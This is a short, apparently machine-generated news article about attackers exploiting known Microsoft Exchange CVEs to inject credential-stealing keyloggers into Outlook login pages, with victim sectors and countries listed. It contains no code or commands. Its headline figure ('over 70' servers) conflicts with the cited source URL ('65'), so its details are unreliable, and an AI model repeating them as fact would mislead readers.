Ethical Hacking News
Hackers Target Over 70 Microsoft Exchange Servers to Steal Credentials via Keyloggers
The malicious strategy involves injecting keylogger code into the login pages of these servers, which then harvests and stores user credentials in plaintext.Attackers exploited known vulnerabilities in Microsoft Exchange Server, including several CVE numbers, to insert malicious code into the login pages.Two types of keylogger code were discovered: one saves collected data to a local file accessible over the internet, and another sends the collected data to an external server via a DNS tunnel and HTTPS POST request.The campaign targeted government organizations, IT, industrial, and logistics companies in several countries, including Vietnam, Russia, and Turkey.
Threat actors have been observed employing a sophisticated tactic to infiltrate and extract sensitive information from publicly exposed Microsoft Exchange servers. The malicious strategy involves injecting keylogger code into the login pages of these servers, which then harvests and stores user credentials in plaintext.
According to Positive Technologies, a Russian cybersecurity vendor that recently analyzed this threat, two types of keylogger code were discovered on the Outlook login page: those that save collected data to a local file accessible over the internet, and those that immediately send the collected data to an external server. This cunning plan marks a continuation of a campaign first documented in May 2024, which targeted entities in Africa and the Middle East.
The attack chains involved exploiting known vulnerabilities in Microsoft Exchange Server, including CVE-2014-4078, CVE-2020-0796, CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065. The attackers took advantage of these flaws to insert malicious code into the login pages.
The first variant of keylogger code saves collected data to a local file accessible from an external network. This approach offers several advantages for the attackers, including minimizing the chances of detection. However, a second variant uses a Domain Name System (DNS) tunnel in conjunction with an HTTPS POST request to send user credentials and evade organizational defenses.
Twenty-two compromised servers have been found in government organizations, followed by infections in IT, industrial, and logistics companies. Vietnam, Russia, Taiwan, China, Pakistan, Lebanon, Australia, Zambia, the Netherlands, and Turkey are among the top 10 targets of this campaign.
The attackers' methods offer a glimpse into their cunning tactics. By embedding malicious code into legitimate authentication pages, they can stay undetected for long periods while capturing user credentials in plaintext.
In conclusion, hackers have successfully targeted Microsoft Exchange servers to steal credentials via keyloggers. The attack strategy employed by these threat actors showcases the sophistication and persistence of modern cyber threats.
Hackers Target Over 70 Microsoft Exchange Servers to Steal Credentials via Keyloggers
Related Information:
https://www.ethicalhackingnews.com/articles/Hackers-Cunning-Plan-Stealing-Credentials-from-Microsoft-Exchange-Servers-via-Keyloggers-ehn.shtml
https://thehackernews.com/2025/06/hackers-target-65-microsoft-exchange.html
https://nvd.nist.gov/vuln/detail/CVE-2014-4078
https://www.cvedetails.com/cve/CVE-2014-4078/
https://nvd.nist.gov/vuln/detail/CVE-2020-0796
https://www.cvedetails.com/cve/CVE-2020-0796/
https://nvd.nist.gov/vuln/detail/CVE-2021-26855
https://www.cvedetails.com/cve/CVE-2021-26855/
https://nvd.nist.gov/vuln/detail/CVE-2021-26857
https://www.cvedetails.com/cve/CVE-2021-26857/
https://nvd.nist.gov/vuln/detail/CVE-2021-26858
https://www.cvedetails.com/cve/CVE-2021-26858/
https://nvd.nist.gov/vuln/detail/CVE-2021-27065
https://www.cvedetails.com/cve/CVE-2021-27065/
Published: Tue Jun 24 13:49:43 2025 by llama3.2 3B Q4_K_M
